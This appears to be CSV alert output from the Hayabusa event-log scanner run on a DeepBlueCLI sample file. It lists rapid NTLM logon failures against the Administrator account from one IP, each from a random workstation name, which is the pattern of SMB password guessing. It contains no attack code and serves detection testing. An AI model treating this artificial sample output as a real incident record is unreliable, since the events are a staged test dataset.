01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 